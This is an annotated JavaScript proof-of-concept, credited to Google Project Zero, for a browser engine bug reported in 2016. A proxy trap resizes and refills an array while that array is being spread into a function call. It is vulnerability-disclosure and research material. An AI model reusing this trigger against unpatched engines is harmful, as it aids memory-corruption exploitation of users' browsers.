- Report: July 2016
- Fix: Oct 2016
- Credit: Richard Zhu
- PoC by Natalie Silvanovich, Google Project Zero
// Trap-invocation counter: the proxy's `get` trap increments it and fires its
// one-shot mutation on the second call (y == 2).
var y = 0;
// The array that is spread into the call at the bottom of the script; it is
// later grown by one hole, re-parented onto the proxy `mp`, and then resized
// and partially filled from inside the `get` trap.
var t = [1,2,3];
// Proxy target. The traps read its elements and, once, reassign its prototype.
var t2 = [4,4,4];
// Proxy in front of t2. Only the `get` trap matters for this PoC; the other
// traps, and the getItem/setItem/removeItem calls inside them, look like
// boilerplate from a storage-style handler. Arrays have none of those methods,
// so any trap that reaches them throws a TypeError.
var mp = new Proxy(t2, {
// Runs for every property read that falls through to the proxy (a single
// operation such as a spread may request several keys).
get: function (oTarget, sKey) {
// Scratch array work with no observable effect on the rest of the script.
var a = [1,2];
a.reverse();
//alert("get " + sKey.toString());
//alert(oTarget.toString());
y = y + 1;
// One-shot side effect on the second trap invocation. Note that it mutates
// `t` (the array being spread at the bottom of the file), not the target.
if(y == 2){
var temp = [];
// temp is a fresh array literal, so this re-sets t2's prototype to
// Array.prototype, which it presumably already is.
oTarget.__proto__ = temp.__proto__;
// Grow t to 10000 elements ...
t.length = 10000;
// ... then write 7 into t[0..999] using Array.prototype.fill with t as `this`.
temp.fill.call(t, 7, 0, 1000);
return 5;
}
// Falls back to getItem whenever the element is falsy; Arrays have no getItem,
// so a miss on t2 (or an element that is 0, '' or undefined) throws here.
return oTarget[sKey] || oTarget.getItem(sKey) || undefined;
},
// Refuses writes to keys the target already has (a false return only raises a
// TypeError for strict-mode callers); everything else goes to setItem, which
// Arrays lack.
set: function (oTarget, sKey, vValue) {
//alert("set " + sKey);
if (sKey in oTarget) { return false; }
return oTarget.setItem(sKey, vValue);
},
// Same shape as `set`: existing keys are refused, others go to a removeItem
// method Arrays do not have.
deleteProperty: function (oTarget, sKey) {
//alert("delete");
if (sKey in oTarget) { return false; }
return oTarget.removeItem(sKey);
},
// The `enumerate` trap was removed from the language in ES2016; current
// engines ignore this entry.
enumerate: function (oTarget, sKey) {
//alert("enum");
return oTarget.keys();
},
// Array.prototype.keys() returns an iterator, not the array-like list of
// property keys the ownKeys contract expects, so this trap is not usable as
// written.
ownKeys: function (oTarget, sKey) {
//alert("ok");
return oTarget.keys();
},
// Reports every key as present, so `key in mp` is always true.
has: function (oTarget, sKey) {
//alert("has" + sKey);
return true;
},
// Only data descriptors are honoured, via setItem (absent on Arrays). The
// trap returns the target object, which the engine coerces to a truthy result.
defineProperty: function (oTarget, sKey, oDesc) {
//alert("dp");
if (oDesc && "value" in oDesc) { oTarget.setItem(sKey, oDesc.value); }
return oTarget;
},
// Depends on getItem (absent on Arrays). It also reports configurable:false,
// which the proxy invariants only permit for a key that really is a
// non-configurable own property of the target.
getOwnPropertyDescriptor: function (oTarget, sKey) {
//alert("fopd");
var vValue = oTarget.getItem(sKey);
return vValue ? {
value: vValue,
writable: true,
enumerable: true,
configurable: false
} : undefined;
},
});
/**
 * Sink for the spread call `q(...t)` at the end of the script. The original
 * alert(a) is commented out, so the function accepts any arguments, does
 * nothing with them, and yields undefined.
 * @param {*} a - first spread argument; intentionally unused
 * @returns {undefined}
 */
function f(a) {
  void a;
}
// Alias for f; the final spread call goes through this binding.
var q = f;
// Grow t from 3 to 4 elements. Index 3 becomes a hole, so reading it walks
// the prototype chain instead of returning an own element.
t.length = 4;
// An object with an accessor at key '3'. It is never attached to anything
// (the line below that would chain it is commented out), and `temperature` is
// not declared anywhere in this file, so the getter would throw a
// ReferenceError if it were ever invoked.
var o = {};
Object.defineProperty(o, '3', {
get: function() {
//alert('get!');
return temperature;
}
});
// Re-parent t onto the proxy: lookups of properties t does not own (for
// example the hole at index 3) now reach mp's `get` trap instead of
// Array.prototype.
t.__proto__ = mp;
//t.__proto__.__proto__ = o;
// Spread t into the call. Iterating t reaches the proxy trap, and on its
// second invocation the trap resizes and partially fills t while the spread
// is still collecting arguments. That re-entrant mutation of the array under
// iteration is the behaviour this PoC exercises.
q(...t);